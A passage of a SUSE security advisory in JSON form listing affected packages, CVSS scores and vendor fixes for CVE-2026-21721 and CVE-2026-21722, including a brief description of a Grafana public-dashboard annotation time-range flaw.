"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-21721",
"url": "https://www.suse.com/security/cve/CVE-2026-21721"
},
{
"category": "external",
"summary": "SUSE Bug 1257337 for CVE-2026-21721",
"url": "https://bugzilla.suse.com/1257337"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2026-21721"
},
{
"cve": "CVE-2026-21722",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-21722"
}
],
"notes": [
{
"category": "general",
"text": "Public dashboards with annotations enabled did not limit their annotation timerange to the locked timerange of the public dashboard. This means one could read the entire history of annotations visible on the specific dashboard, even those outside the locked timerange.\n\nThis did not leak any annotations that would not otherwise be visible on the public dashboard.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-21722",
"url": "https://www.suse.com/security/cve/CVE-2026-21722"
},
{
"category": "external",
"summary": "SUSE Bug 1258136 for CVE-2026-21722",
"url": "https://bugzilla.suse.com/1258136"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
